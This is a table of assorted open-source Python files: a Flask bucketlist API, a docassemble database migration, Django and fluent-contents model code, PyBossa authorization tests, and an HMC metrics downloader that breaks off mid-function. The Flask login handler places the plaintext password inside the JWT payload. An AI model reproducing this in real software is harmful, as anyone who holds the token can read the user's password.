code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
from flask import request
from flask.ext.restful import Resource
from .decorators import auth
from .helpers import *
from .models import User, BucketList, BucketListItem
class LoginUser(Resource):
    '''
    Manage responses to user requests.
    URL:
        /api/v1/auth/login/
    Methods:
        POST
    '''

    def post(self):
        '''
        Authenticates a user.
        Returns:
            json: message indicating Authentication Token or an error message
        '''
        username = request.form.get('username')
        password = request.form.get('password')
        # Guard clauses: reject missing credentials, unknown users and bad
        # passwords early, in that order, each with a 406 and its message.
        if not (username and password):
            return messages['user_pass_blank'], 406
        if not auth.valid_username(username):
            return messages['username_not_found'], 406
        if not auth.valid_password(username, password):
            return messages['password_incorrect'], 406
        # Credentials check out: issue a JWT signed with the app secret.
        payload = {'username': username, 'password': password}
        secret_key = current_app.config.get('SECRET_KEY')
        return {'token': jwt.encode(payload, secret_key)}, 200
class RegisterUser(Resource):
    '''
    Manage responses to user requests.
    URL:
        /api/v1/auth/register/
    Methods:
        POST
    '''

    def post(self):
        '''
        Register a user.
        Returns:
            json: message indicating the username has been registered or not
        '''
        username = request.form.get('username')
        password = request.form.get('password')
        # Both fields are mandatory for registration.
        if not (username and password):
            return messages['user_pass_blank'], 406
        # A valid (existing) username means the name is already taken.
        if auth.valid_username(username):
            return messages['user_exist'], 406
        new_user = User(username, password)
        if save_model(new_user):
            return get_user(new_user), 201
        return messages['not_registered'], 400
class SingleBucketList(Resource):
    '''
    Manage responses to single bucketlists requests.
    URL:
        /api/v1/bucketlists/<id>/
    Methods:
        GET, PUT, DELETE
    '''

    @auth.user_is_login
    @auth.bucketlist_exist
    def get(self, id):
        '''
        Retrieve the bucketlist using an id.
        Args:
            id: The id of the bucketlist to be retrieved (required)
        Returns:
            json: The bucketlist with its content
        '''
        # Existence of the bucketlist is guaranteed by @auth.bucketlist_exist.
        bucketlist = BucketList.query.filter_by(
            id=id).first()
        bucketlist_output = get_bucketlist(bucketlist)
        return {'data': bucketlist_output}, 200

    @auth.user_is_login
    @auth.bucketlist_exist
    def put(self, id):
        '''
        Updates the bucketlist using an id.
        Args:
            id: The id of the bucketlist to be updated (required)
        Returns:
            json: message indicating Bucketlist has been updated
        '''
        name = request.form.get('name')
        # The Token header identifies the acting user.
        token = request.headers.get('Token')
        current_user = get_current_user_id(token)
        # Refuse the rename when this user already owns a list with the
        # requested name (names are unique per user).
        check_bucketlist_name = BucketList.query.filter_by(
            name=name, created_by=current_user).first()
        if not check_bucketlist_name:
            bucketlist = BucketList.query.filter_by(id=id).first()
            bucketlist.name = name
            # 200 with the updated record on commit, 400 on commit failure.
            return (get_bucketlist(bucketlist), 200) if update_database() \
                else (messages['bucketlist_not_updated'], 400)
        else:
            return messages['bucketlist_exist'], 406

    @auth.user_is_login
    @auth.bucketlist_exist
    def delete(self, id):
        '''
        Delete the bucketlist with the specified id.
        Args:
            id: The id of the bucketlist to be deleted (required)
        Returns:
            json: message indicating Bucketlist has been deleted
        '''
        bucketlist = BucketList.query.filter_by(id=id).first()
        # 204 (no content) on success, 400 if the delete could not be applied.
        return (messages['bucketlist_deleted'], 204) \
            if delete_model(bucketlist) \
            else (messages['bucketlist_not_deleted'], 400)
class AllBucketLists(Resource):
    '''
    Manage responses to bucketlists requests by a user.
    URL:
        /api/v1/bucketlists/
    Methods:
        GET, POST
    '''

    @auth.user_is_login
    def get(self):
        '''
        Retrieve all bucketlists for a particular user.
        Args:
            q: Searches bucketlists by name (optional)
            limit: Limit number of retrieved bucketlists per page (optional)
            page: Number of pages to contain retrieved bucketlists (optional)
        Returns:
            json: All bucketlists with their content
        '''
        params = request.args.to_dict()
        # Default page size is 20, hard-capped at 100 to bound responses.
        limit = int(params.get('limit', 20))
        limit = 100 if int(limit) > 100 else limit
        search_by = params.get('q', '')
        page = int(params.get('page', 1))
        # Scope the query to the user identified by the Token header.
        token = request.headers.get('Token')
        user_id = get_current_user_id(token)
        # Substring match on the bucketlist name (empty q matches all).
        search_results = BucketList.query.filter_by(
            created_by=user_id).filter(BucketList.name.like('%{}%'.format
                                                            (search_by)))
        all_bucketlist = search_results.paginate(
            page=page, per_page=limit, error_out=False)
        # Build absolute prev/next links only when such a page exists.
        next_page = str(request.url_root) + 'api/v1/bucketlists?' + \
            'limit=' + str(limit) + '&page=' + str(page + 1) \
            if all_bucketlist.has_next else None
        previous_page = request.url_root + 'api/v1/bucketlists?' + \
            'limit=' + str(limit) + '&page=' + str(page - 1) \
            if all_bucketlist.has_prev else None
        bucketlist_output = [get_bucketlist(
            bucketlist) for bucketlist in all_bucketlist.items]
        return {'data': bucketlist_output,
                'pages': all_bucketlist.pages,
                'previous_page': previous_page,
                'next_page': next_page}, 200

    @auth.user_is_login
    def post(self):
        '''
        Create a new bucketlist for a particular user.
        Args:
            Params:
                name: Name for the bucketlist (required)
            Header:
                Token: Authentication Token for the User (required)
        Returns:
            json: message indicating bucketlist has been created or not
        '''
        name = request.form.get('name')
        token = request.headers.get('Token')
        current_user = get_current_user_id(token)
        # Bucketlist names are unique per user; probe for a clash first.
        bucketlist = BucketList.query.filter_by(
            name=name, created_by=current_user).first()
        if name:
            if bucketlist:
                return messages['bucketlist_exist'], 406
            else:
                bucketlist = BucketList(name, current_user)
                # 201 with the new record on commit, 400 on commit failure.
                return (get_bucketlist(bucketlist), 201) if \
                    save_model(bucketlist) \
                    else (messages['bucketlist_not_saved'], 400)
        else:
            return messages['no_bucketlist_name'], 406
class AllBucketListItems(Resource):
    '''
    Manage responses to bucketlistitem requests by a user.
    URL:
        /api/v1/bucketlists/<id>/items/
    Methods:
        POST
    '''

    @auth.user_is_login
    @auth.bucketlist_exist
    def post(self, id):
        '''
        Create a new bucketlist item for a particular bucketlist.
        Args:
            id: The id of the bucketlist which an item is being added
        Parameters:
            name: Name for the bucketlist item (required)
        Header:
            Token: Authentication Token for the User (required)
        Returns:
            json: message indicating bucketlist item has been created or not
        '''
        name = request.form.get('name')
        # Item names are unique within a bucketlist; probe for a clash.
        existing_item = BucketListItem.query.filter_by(
            name=name, bucketlist_id=id).first()
        if not name:
            return messages['no_bucketlist_item_name'], 406
        if existing_item:
            return messages['bucketlist_item_exist'], 406
        new_item = BucketListItem(name=name, bucketlist_id=id)
        if save_model(new_item):
            return get_single_bucketlist_item(new_item), 201
        return messages['bucketlist_item_not_saved'], 400
class SingleBucketListItem(Resource):
    '''
    Manage responses to single bucketlistitem requests by a user.
    URL:
        /api/v1/bucketlists/<id>/items/<item_id>
    Methods:
        PUT, DELETE
    '''

    @auth.user_is_login
    @auth.bucketlist_exist
    @auth.bucketlist_item_exist
    def put(self, id, item_id):
        '''
        Updates a single bucketlistitem given the item_id
        and the bucketlist_id
        URL:
            /api/v1/bucketlists/<id>/items/<item_id>
        Args:
            item_id: The id of the bucketlist item to be updated (required)
            id: The id of the bucketlist whose item is being updated (required)
        Parameters:
            name: The name for the bucketlist item (optional)
            done: The status of the bucketlist item (optional)
        Header:
            Token: Authentication Token for the User (required)
        Returns:
            json: message indicating bucketlist_item has been updated or not
        '''
        # Existence of the item is guaranteed by the decorators above.
        bucketlist_item = BucketListItem.query.filter_by(
            id=item_id, bucketlist_id=id).first()
        name = request.form.get('name')
        done = request.form.get('done')
        # Form values are strings; anything other than 'true' (any case)
        # is treated as False.
        done = True if str(done).lower() == 'true' else False
        # If the item already has exactly this (name, done) state, report a
        # conflict instead of writing a no-op update.
        check_bucketlist_item_details = BucketListItem.query.filter_by(
            name=name, id=item_id, bucketlist_id=id, done=done).first()
        if not check_bucketlist_item_details:
            bucketlist_item.name = name
            bucketlist_item.done = done
            return (get_single_bucketlist_item(bucketlist_item), 200) \
                if update_database() \
                else (messages['bucketlist_item_not_updated'], 400)
        else:
            return messages['bucketlist_item_exist'], 406

    @auth.user_is_login
    @auth.bucketlist_exist
    @auth.bucketlist_item_exist
    def delete(self, id, item_id):
        '''
        Deletes a single bucketlistitem given the item_id
        and the bucketlist_id.
        URL:
            /api/v1/bucketlists/<id>/items/<item_id>
        Args:
            item_id: The id of the bucketlist item to be deleted (required)
            id: The id of the bucketlist whose item is being deleted (required)
        Header:
            Token: Authentication Token for the User (required)
        Returns:
            json: message indicating bucketlist_item has been deleted or not
        '''
        bucketlist_item = BucketListItem.query.filter_by(
            id=item_id, bucketlist_id=id).first()
        # 204 on success; 400 when the delete could not be committed.
        return (messages['bucketlist_item_deleted'], 204) \
            if delete_model(bucketlist_item) else \
            (messages['bucketlist_item_not_deleted'], 400)
| andela-hoyeboade/bucketlist-api | app/resources.py | Python | mit | 11,032 |
"""alter database for mysql compatibility
Revision ID: 9be372ec38bc
Revises: 4328f2c08f05
Create Date: 2020-02-16 15:43:35.276655
"""
from alembic import op
import sqlalchemy as sa
from docassemble.webapp.database import dbtableprefix, dbprefix, daconfig
import sys
# revision identifiers, used by Alembic.
revision = '9be372ec38bc'
down_revision = '4328f2c08f05'
branch_labels = None
depends_on = None
def upgrade():
    """Convert unbounded text columns to length-limited varchar columns.

    MySQL cannot index unbounded TEXT columns, so bounded String types are
    applied. On PostgreSQL the conversion is skipped unless the
    'force text to varchar upgrade' config flag is set.
    """
    if dbprefix.startswith('postgresql') and not daconfig.get('force text to varchar upgrade', False):
        sys.stderr.write("Not changing text type to varchar type because underlying database is PostgreSQL\n")
    else:
        # (table, column, length) triples, altered in the original order.
        varchar_columns = [
            ('userdict', 'filename', 255),
            ('userdictkeys', 'filename', 255),
            ('chatlog', 'filename', 255),
            ('uploads', 'filename', 255),
            ('uploads', 'yamlfile', 255),
            ('objectstorage', 'key', 1024),
            ('speaklist', 'filename', 255),
            ('shortener', 'filename', 255),
            ('shortener', 'key', 255),
            ('machinelearning', 'key', 1024),
            ('machinelearning', 'group_id', 1024),
            ('globalobjectstorage', 'key', 1024),
        ]
        for table, column, length in varchar_columns:
            op.alter_column(
                table_name=table,
                column_name=column,
                type_=sa.String(length)
            )
    # The index is created unconditionally, even when the type change was
    # skipped for PostgreSQL.
    op.create_index(dbtableprefix + 'ix_uploads_yamlfile', 'uploads', ['yamlfile'])
def downgrade():
    """Revert the varchar columns back to unbounded text and drop the index.

    NOTE(review): unlike upgrade(), this does not skip the column changes on
    PostgreSQL — confirm that reverting to Text is harmless there.
    """
    # (table, column) pairs, reverted in the original order.
    text_columns = [
        ('userdict', 'filename'),
        ('userdictkeys', 'filename'),
        ('chatlog', 'filename'),
        ('uploads', 'filename'),
        ('uploads', 'yamlfile'),
        ('objectstorage', 'key'),
        ('speaklist', 'filename'),
        ('shortener', 'filename'),
        ('shortener', 'key'),
        ('machinelearning', 'key'),
        ('machinelearning', 'group_id'),
        ('globalobjectstorage', 'key'),
    ]
    for table, column in text_columns:
        op.alter_column(
            table_name=table,
            column_name=column,
            type_=sa.Text()
        )
    op.drop_index(dbtableprefix + 'ix_uploads_yamlfile', table_name='uploads')
| jhpyle/docassemble | docassemble_webapp/docassemble/webapp/alembic/versions/9be372ec38bc_alter_database_for_mysql_compatibility.py | Python | mit | 3,895 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import messages
from django.contrib.admin.models import DELETION, LogEntry
from django.contrib.admin.options import get_content_type_for_model
from django.core.urlresolvers import NoReverseMatch, Resolver404, resolve, reverse
from django.http import HttpResponseRedirect
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from .models import Post
class RedirectOnDeleteMiddleware(object):
    """Turn the 404 after deleting a Post into a redirect for staff users.

    When a staff user deletes a ``Post`` from the admin and lands back on
    the now-missing detail page, this middleware redirects to the posts
    list (or '/') and flashes a "was deleted" message instead of serving
    a bare 404.
    """

    model = Post

    def is_post_detail_view(self, request):
        """Return True when the request resolves to this app's post_detail view."""
        try:
            matched_url = resolve(request.path_info)
        except Resolver404:
            return False
        # Bug fix: the original condition negated the app-name comparison
        # (`not matched_url.app_name == ...`), so a request to this app's own
        # namespaced post_detail view could never match and the redirect
        # below never fired.
        if matched_url and matched_url.app_name == self.model._meta.app_label \
                and matched_url.url_name == 'post_detail':
            return True

    def process_response(self, request, response):
        """Rewrite 404 responses on post_detail that follow a Post deletion."""
        if response.status_code != 404:
            return response
        if not self.is_post_detail_view(request):
            return response
        if request.user.is_staff:
            # Look at this user's most recent admin log entry to decide
            # whether the 404 was caused by a just-performed deletion.
            try:
                log_entry = LogEntry.objects.filter(user=request.user).order_by('-pk')[0]
            except IndexError:
                log_entry = None
            if log_entry and log_entry.action_flag == DELETION \
                    and log_entry.content_type_id == get_content_type_for_model(self.model).pk:
                try:
                    redirect_url = reverse('blog:posts_list')
                except NoReverseMatch:
                    redirect_url = '/'
                msg = _('The %(name)s "%(obj)s" was deleted.') % {
                    'name': force_text(self.model._meta.verbose_name),
                    'obj': log_entry.object_repr
                }
                messages.error(request, msg)
                return HttpResponseRedirect(redirect_url)
        return response
| mishbahr/staticgen-demo | staticgen_demo/blog/middleware.py | Python | bsd-3-clause | 1,941 |
import django
from django.contrib.contenttypes.fields import GenericRel, GenericRelation
from django.contrib.contenttypes.models import ContentType
from django.db import DEFAULT_DB_ALIAS
from django.db.models.query_utils import Q
from django.utils.functional import lazy
from django.utils.text import capfirst
from fluent_contents import appsettings
from fluent_contents.forms.fields import PlaceholderFormField
from .db import ContentItem, Placeholder
__all__ = ("PlaceholderRelation", "ContentItemRelation", "PlaceholderField")
# The PlaceholderField is inspired by Django CMS
# Yet uses a different methology to access the fields.
#
# In Django CMS it's a ForeignKey to Placeholder.
# Here, the Placeholder has a GenericForeignKey to the parent - hence it will be deleted when the parent is removed -
# so the PlaceholderField is merely a reverse GenericRelation.
#
# In the admin, the logic of the PlaceholderEditor code can be reused.
class PlaceholderRelation(GenericRelation):
    """
    A :class:`~django.contrib.contenttypes.generic.GenericRelation` which can be applied to a parent model that
    is expected to be referenced be a :class:`~fluent_contents.models.Placeholder`. For example:
    .. code-block:: python
        class Page(models.Model):
            placeholder_set = PlaceholderRelation()
    """

    def __init__(self, **kwargs):
        # Default limit_choices_to restricts the relation to Placeholder
        # parents; callers may still override it explicitly. The lazy()
        # wrapper postpones the ContentType lookup until query time.
        kwargs.setdefault(
            "limit_choices_to",
            Q(
                parent_type=lazy(
                    lambda: ContentType.objects.get_for_model(Placeholder), ContentType
                )()
            ),
        )
        super(PlaceholderRelation, self).__init__(
            to=Placeholder,
            object_id_field="parent_id",
            content_type_field="parent_type",
            **kwargs
        )
class ContentItemRelation(GenericRelation):
    """
    A :class:`~django.contrib.contenttypes.generic.GenericRelation` which can be applied to a parent model that
    is expected to be referenced by the :class:`~fluent_contents.models.ContentItem` classes. For example:
    .. code-block:: python
        class Page(models.Model):
            contentitem_set = ContentItemRelation()
    Adding this relation also causes the admin delete page to list the
    :class:`~fluent_contents.models.ContentItem` objects which will be deleted.
    """

    def __init__(self, **kwargs):
        super(ContentItemRelation, self).__init__(
            to=ContentItem,
            object_id_field="parent_id",
            content_type_field="parent_type",
            **kwargs
        )

    def bulk_related_objects(self, objs, using=DEFAULT_DB_ALIAS):
        # The admin delete screen breaks on polymorphic querysets; force a
        # plain queryset. Workaround for
        # https://github.com/django-polymorphic/django-polymorphic/issues/34
        related_qs = super(ContentItemRelation, self).bulk_related_objects(objs)
        return related_qs.non_polymorphic()
class PlaceholderRel(GenericRel):
    """
    The internal :class:`~django.contrib.contenttypes.generic.GenericRel`
    that is used by the :class:`PlaceholderField` to support queries.
    """

    def __init__(
        self,
        field,
        to,
        related_name=None,
        related_query_name=None,
        limit_choices_to=None,
    ):
        # Note: all other args are provided for Django 1.9 compatibility.
        # The incoming `to`, `related_name` and `limit_choices_to` values are
        # deliberately ignored and replaced with fixed values below.
        # lazy() defers the ContentType lookup until the query runs, so no
        # database access happens at class-definition time.
        limit_choices_to = Q(
            parent_type=lazy(
                lambda: ContentType.objects.get_for_model(Placeholder), ContentType
            )(),
            slot=field.slot,
        )
        # TODO: make sure reverse queries work properly
        super(PlaceholderRel, self).__init__(
            field=field,
            to=Placeholder,
            related_name=None,  # NOTE: must be unique for app/model/slot.
            limit_choices_to=limit_choices_to,
        )
class PlaceholderFieldDescriptor(object):
    """
    This descriptor is placed on the PlaceholderField model instance
    by the :func:`~PlaceholderField.contribute_to_class` function.
    This causes ``instance.field`` to return a :class:`~fluent_contents.models.Placeholder` object.
    """

    def __init__(self, slot):
        """Remember which slot this descriptor serves."""
        self.slot = slot

    def __get__(self, instance, instance_type=None):
        """Look up the Placeholder of ``instance`` for this slot."""
        # Class-level access returns the descriptor itself, per convention.
        if instance is None:
            return self

        try:
            placeholder = Placeholder.objects.get_by_slot(instance, self.slot)
        except Placeholder.DoesNotExist:
            parent_type = ContentType.objects.get_for_model(
                instance, for_concrete_model=False
            )
            raise Placeholder.DoesNotExist(
                "Placeholder does not exist for parent {0} (type_id: {1}, parent_id: {2}), slot: '{3}'".format(
                    repr(instance), parent_type.pk, instance.pk, self.slot
                )
            )

        placeholder.parent = instance  # fill the reverse cache
        return placeholder

    def __set__(self, instance, value):
        if instance is None:
            raise AttributeError("Descriptor must be accessed via instance")
        # "-DUMMY-" is silently accepted so forms can submit a placeholder
        # value without triggering the NotImplementedError below.
        if value == "-DUMMY-":
            return
        raise NotImplementedError(
            "Setting Placeholder value is not supported, use Placeholder.objects.create_for_object() instead."
        )
class PlaceholderField(PlaceholderRelation):
    """
    The model field to add :class:`~fluent_contents.models.ContentItem` objects to a model.
    :param slot: A programmatic name to identify the placeholder.
    :param plugins: Optional, define which plugins are allowed to be used. This can be a list of names, or :class:`~fluent_contents.extensions.ContentPlugin` references.
    :type slot: str
    :type plugins: list
    This class provides the form fields for the field. Use this class in a model to use it:
    .. code-block:: python
        class Article(models.Model):
            contents = PlaceholderField("article_contents")
    The data itself is stored as reverse relation in the :class:`~fluent_contents.models.ContentItem` object.
    Hence, all contents will be cleaned up properly when the parent model is deleted.
    The placeholder will be displayed in the admin:
    .. image:: /images/admin/placeholderfieldadmin1.png
       :width: 770px
       :height: 562px
       :alt: django-fluent-contents placeholder field preview
    """

    rel_class = PlaceholderRel  # Django 1.9

    def __init__(self, slot, plugins=None, **kwargs):
        """
        Initialize the placeholder field.
        """
        self.slot = slot
        super(PlaceholderField, self).__init__(**kwargs)
        # See if a plugin configuration is defined in the settings
        self._slot_config = (
            appsettings.FLUENT_CONTENTS_PLACEHOLDER_CONFIG.get(slot) or {}
        )
        # An explicit `plugins` argument takes precedence over the per-slot
        # setting; None means "all plugins allowed" (see the plugins property).
        self._plugins = plugins or self._slot_config.get("plugins") or None
        # Overwrite some hardcoded defaults from the base class.
        # TODO: support blank: False to enforce adding at least one plugin.
        self.editable = True
        self.blank = True

    def formfield(self, **kwargs):
        """
        Returns a :class:`PlaceholderFormField` instance for this database Field.
        """
        defaults = {
            "label": capfirst(self.verbose_name),
            "help_text": self.help_text,
            "required": not self.blank,
        }
        defaults.update(kwargs)
        return PlaceholderFormField(slot=self.slot, plugins=self._plugins, **defaults)

    def contribute_to_class(self, cls, name, **kwargs):
        """
        Internal Django method to associate the field with the Model; it assigns the descriptor.
        """
        super(PlaceholderField, self).contribute_to_class(cls, name, **kwargs)
        # overwrites what instance.<colname> returns; give direct access to the placeholder
        setattr(cls, name, PlaceholderFieldDescriptor(self.slot))
        # Make placeholder fields easy to find
        # Can't assign this to cls._meta because that gets overwritten by every level of model inheritance.
        if not hasattr(cls, "_meta_placeholder_fields"):
            cls._meta_placeholder_fields = {}
        cls._meta_placeholder_fields[name] = self
        # Configure the revere relation if possible.
        # TODO: make sure reverse queries work properly
        if django.VERSION >= (1, 11):
            rel = self.remote_field
        else:
            rel = self.rel
        if rel.related_name is None:
            # Make unique for model (multiple models can use same slotnane)
            rel.related_name = "{app}_{model}_{slot}_FIXME".format(
                app=cls._meta.app_label,
                model=cls._meta.object_name.lower(),
                slot=self.slot,
            )
        # Remove attribute must exist for the delete page. Currently it's not actively used.
        # The regular ForeignKey assigns a ForeignRelatedObjectsDescriptor to it for example.
        # In this case, the PlaceholderRelation is already the reverse relation.
        # Being able to move forward from the Placeholder to the derived models does not have that much value.
        # NOTE(review): this mixes the version-dependent `rel` with `self.rel`;
        # on Django versions where `self.rel` is unavailable this line would
        # fail — confirm and unify to `rel.to` / `rel.related_name`.
        setattr(rel.to, self.rel.related_name, None)

    @property
    def plugins(self):
        """
        Get the set of plugins that this field may display.
        """
        from fluent_contents import extensions

        # None means "no restriction": expose every registered plugin.
        if self._plugins is None:
            return extensions.plugin_pool.get_plugins()
        else:
            try:
                return extensions.plugin_pool.get_plugins_by_name(*self._plugins)
            except extensions.PluginNotFound as e:
                # Re-raise with a hint about where the bad name was configured.
                raise extensions.PluginNotFound(
                    str(e)
                    + " Update the plugin list of '{0}.{1}' field or FLUENT_CONTENTS_PLACEHOLDER_CONFIG['{2}'] setting.".format(
                        self.model._meta.object_name, self.name, self.slot
                    )
                )

    def value_from_object(self, obj):
        """
        Internal Django method, used to return the placeholder ID when exporting the model instance.
        """
        try:
            # not using self.attname, access the descriptor instead.
            placeholder = getattr(obj, self.name)
        except Placeholder.DoesNotExist:
            # Still allow ModelForm / admin to open and create a new Placeholder if the table was truncated.
            return None
        # Be consistent with other fields, like ForeignKey:
        return placeholder.id if placeholder else None
| edoburu/django-fluent-contents | fluent_contents/models/fields.py | Python | apache-2.0 | 10,676 |
# -*- coding: utf8 -*-
# This file is part of PyBossa.
#
# Copyright (C) 2015 SciFabric LTD.
#
# PyBossa is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyBossa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PyBossa. If not, see <http://www.gnu.org/licenses/>.
from default import Test, assert_not_raises
from pybossa.auth import ensure_authorized_to
from nose.tools import assert_raises
from werkzeug.exceptions import Forbidden, Unauthorized
from mock import patch
from test_authorization import mock_current_user
class TestTokenAuthorization(Test):
    """Authorization tests for the oauth token resource.

    Expected contract: anonymous users get Unauthorized (401) for every
    action; authenticated users get Forbidden (403) for delete, create and
    update, and are only allowed to read their own tokens. Each check is
    repeated for every supported auth provider.
    """

    # Providers whose tokens share the same authorization rules.
    auth_providers = ('twitter', 'facebook', 'google')
    # Fake current_user objects patched in per test.
    mock_anonymous = mock_current_user()
    mock_authenticated = mock_current_user(anonymous=False, admin=False, id=2)

    @patch('pybossa.auth.current_user', new=mock_anonymous)
    def test_anonymous_user_delete(self):
        """Test anonymous user is not allowed to delete an oauth token"""
        for token in self.auth_providers:
            assert_raises(Unauthorized,
                          ensure_authorized_to, 'delete', 'token', token=token)

    @patch('pybossa.auth.current_user', new=mock_authenticated)
    def test_authenticated_user_delete(self):
        """Test authenticated user is not allowed to delete an oauth token"""
        for token in self.auth_providers:
            assert_raises(Forbidden,
                          ensure_authorized_to, 'delete', 'token', token=token)

    @patch('pybossa.auth.current_user', new=mock_anonymous)
    def test_anonymous_user_create(self):
        """Test anonymous user is not allowed to create an oauth token"""
        for token in self.auth_providers:
            assert_raises(Unauthorized,
                          ensure_authorized_to, 'create', 'token', token=token)

    @patch('pybossa.auth.current_user', new=mock_authenticated)
    def test_authenticated_user_create(self):
        """Test authenticated user is not allowed to create an oauth token"""
        for token in self.auth_providers:
            assert_raises(Forbidden,
                          ensure_authorized_to, 'create', 'token', token=token)

    @patch('pybossa.auth.current_user', new=mock_anonymous)
    def test_anonymous_user_update(self):
        """Test anonymous user is not allowed to update an oauth token"""
        for token in self.auth_providers:
            assert_raises(Unauthorized,
                          ensure_authorized_to, 'update', 'token', token=token)

    @patch('pybossa.auth.current_user', new=mock_authenticated)
    def test_authenticated_user_update(self):
        """Test authenticated user is not allowed to update an oauth token"""
        for token in self.auth_providers:
            assert_raises(Forbidden,
                          ensure_authorized_to, 'update', 'token', token=token)

    @patch('pybossa.auth.current_user', new=mock_anonymous)
    def test_anonymous_user_read(self):
        """Test anonymous user is not allowed to read an oauth token"""
        for token in self.auth_providers:
            assert_raises(Unauthorized,
                          ensure_authorized_to, 'read', 'token', token=token)

    @patch('pybossa.auth.current_user', new=mock_authenticated)
    def test_authenticated_user_read(self):
        """Test authenticated user is allowed to read his own oauth tokens"""
        for token in self.auth_providers:
            assert_not_raises(Exception,
                              ensure_authorized_to, 'read', 'token', token=token)
| geotagx/pybossa | test/test_authorization/test_token_auth.py | Python | agpl-3.0 | 3,924 |
# Copyright 2015, 2016 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from src.performance_capacity_monitor import JsonFilesDownload
from src.utility import HMCClientLogger,HTTPClient
import json
import time
import feedparser
import sys
log_object=HMCClientLogger.HMCClientLogger(__name__)
ROOT = "ManagedSystem"
CONTENT_TYPE = "application/atom+xml"
class LongTermMonitor:
    """Download Long Term Monitor (LTM) raw metric JSON files from an HMC.

    Fetches the LTM Atom feed for a managed system, parses it with
    feedparser, and downloads either every JSON file or only the most
    recent PHYP / per-VIOS files.
    """

    def __init__(self, ip, managedsystem_id, x_api_session):
        """
        initializes root,content_type and services
        Args:
            ip : ip address of HMC
            managedsystem_id : UUID of ManagedSystem
            x_api_session : session to be used
        """
        self.service = "pcm"
        self.root = ROOT
        self.ip = ip
        self.managedsystem_id = managedsystem_id
        self.x_api_session = x_api_session
        self.content_type = CONTENT_TYPE

    def json_download_all_files(self, HTTP_object, feedparser_LTM, object_list):
        """
        downloads all the available json files for Long term metrics
        Args:
            HTTP_object : HTTP Request object carrying the headers and URL
            feedparser_LTM : feedparser object containing the entries of LTM
            object_list : Available VIOS object List (currently unused here)
        Returns:
            5 when the user interrupts with ctrl+c; None otherwise.
        """
        try:
            print("press ctrl+c to exit")
            for i in range(0, len(feedparser_LTM.entries)):
                json_url_link = feedparser_LTM.entries[i].links[0].href
                # Get the links for long term monitor json files and perform get request
                HTTP_object.HTTPGet(url=json_url_link)
                log_object.log_debug("response code for Long Term Monitor json file links %s" % (HTTP_object.response))
                # Skip entries whose download failed (response_b is falsy).
                if not HTTP_object.response_b:
                    continue
                # Downloading the json file
                JsonFilesDownload.json_file(feedparser_LTM.entries[i].title, HTTP_object.response.text)
        except KeyboardInterrupt:
            # Sentinel understood by get_longtermmonitor(): skip the sleep
            # and redisplay the menu immediately.
            return 5

    def json_download_recent_files_phyp(self, HTTP_object, feedparser_LTM, object_list):
        """
        downloads the recent json files for Long term metrics PHYP
        Args:
            HTTP_object : HTTP Request object carrying the headers and URL
            feedparser_LTM : feedparser object containing the entries of LTM
            object_list : Available VIOS object List (unused here)
        """
        timestamp_phyp = []
        # get timestamps of all the json files of category phyp
        # NOTE(review): the timestamp is extracted by a fixed substring of the
        # href ([154:160]); this assumes a fixed URL layout — verify against
        # the HMC REST URL format before changing anything here.
        for j in range(0, len(feedparser_LTM.entries)):
            if feedparser_LTM.entries[j].category == "phyp":
                timestamp_phyp.append(feedparser_LTM.entries[j].links[0].href[154:160])
        timestamp_phyp.sort()
        # Download the entry whose embedded timestamp equals the largest one.
        for k in range(0, len(feedparser_LTM.entries)):
            if(feedparser_LTM.entries[k].category == "phyp" and feedparser_LTM.entries[k].links[0].href[154:160] == timestamp_phyp[len(timestamp_phyp)-1]):
                json_url = feedparser_LTM.entries[k].links[0].href
                #print (feedparser_LTM.entries[i].links[0].href)
                HTTP_object.HTTPGet(url=json_url)
                log_object.log_debug(HTTP_object.response)
                print("\nThe recent json file of Powerhypervisor : ")
                JsonFilesDownload.json_file(feedparser_LTM.entries[k].title, HTTP_object.response.text)
                break

    def json_download_recent_files_vios(self, HTTP_object, feedparser_LTM, object_list):
        """
        downloads the recent json files for Long term metrics VIOS
        Args:
            HTTP_object : HTTP Request object carrying the headers and URL
            feedparser_LTM : feedparser object containing the entries of LTM
            object_list : Available VIOS object List
        """
        try:
            timestamp_vios = []
            vios_names = self.get_virtualioserver_list(object_list)
            #print(object_list)
            # One timestamp list per VIOS name.
            for k in range(0, len(vios_names)):
                #print(vios_names[k])
                timestamp_vios.append([])
            # NOTE(review): like the phyp variant, this relies on a fixed
            # href substring ([156:162]) holding the timestamp.
            for j in range(0, len(vios_names)):
                for i in range(0, len(feedparser_LTM.entries)):
                    if feedparser_LTM.entries[i].category == vios_names[j]:
                        timestamp_vios[j].append(feedparser_LTM.entries[i].links[0].href[156:162])
                timestamp_vios[j].sort()
            # For each VIOS, download the entry carrying its latest timestamp.
            for j in range(0, len(vios_names)):
                for i in range(0, len(feedparser_LTM.entries)):
                    if feedparser_LTM.entries[i].category == vios_names[j] and feedparser_LTM.entries[i].links[0].href[156:162] == timestamp_vios[j][len(timestamp_vios[j])-1]:
                        #print (feedparser_LTM.entries[i].links[0].href)
                        json_url = feedparser_LTM.entries[i].links[0].href
                        HTTP_object.HTTPGet(url=json_url)
                        log_object.log_debug(HTTP_object.response)
                        print("\nThe recent json file of VirtualIOserver :%s " % (vios_names[j]))
                        JsonFilesDownload.json_file(feedparser_LTM.entries[i].title, HTTP_object.response.text)
                        break
        except TypeError:
            # get_virtualioserver_list returned None / non-iterable input.
            log_object.log_warn("There are no VIOS available in the system")

    def get_virtualioserver_list(self, object_list):
        # Build feed category names ("vios_<partition id>") for each VIOS.
        vios_names = []
